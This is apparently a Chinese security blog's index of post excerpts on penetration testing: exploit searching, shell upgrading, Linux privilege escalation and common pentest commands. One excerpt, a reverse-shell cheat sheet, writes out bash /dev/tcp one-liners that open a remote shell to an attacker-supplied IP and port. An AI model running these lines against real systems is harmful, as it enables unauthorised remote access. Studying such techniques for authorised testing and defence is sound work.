摘要:
搜索漏洞 浏览器 在google或其搜索引擎进行搜索:<service_name> [version] exploit 还可以在https://exploits.shodan.io进行搜索。 Searchsploit 在kali的控制台上搜索 #Searchsploit tricks searchs 阅读全文
摘要:
升级远程 shell(仅限 Unix 机器) https://netsec.ws/?p=337 通常,在通过 nc 捕获 shell 之后,会在一个功能非常有限的 shell 中。例如没有命令历史记录(并使用向上“”和“向下”箭头循环浏览它们)和文件名称、命令自动完成等。在缺少这些功能的 shell 阅读全文
摘要:
提权概念 特权升级有两种类型:水平和垂直。在水平升级中,您从一个用户转移到 另一个用户。在这种情况下,两个用户都是通用的,而在垂直方式中,我们将特权从普通用户提升为管理员。 用户无法访问(读取/写入/执行)不允许访问的文件。但是,超级用户 (root)可以访问系统上存在的所有文件。为了更改任何重要的 阅读全文
摘要:
反弹shell IP:8.8.8.8 Port:8888 Bash TCP Victim bash -c 'exec bash -i &>/dev/tcp/8.8.8.8/8888 <&1' bash -i >& /dev/tcp/8.8.8.8/8888 0>&1 /bin/bash -i > / 阅读全文
摘要:
Linux提权 本项目用来记录自己在Linux提权过程中遇到的一些内容,包括提权方法提权工具等。Linux提权在后渗透过程中也较为重要,因为我们将会在此仓库持续更新Linux提权的相关内容!提权有风险,提权需谨慎。不到非提不可的情况下千万不要尝试提权! 作者:0e0w 01-Linux提权基础知识 阅读全文
摘要:
command 收集渗透中会用到的常用命令 。 更新时间:2022.2.27 Table of Contents command nmap 存活主机 bypass gobuster dirsearch nbtscan 代理工具 ssh grep mysql sqlmap hydra medusa p 阅读全文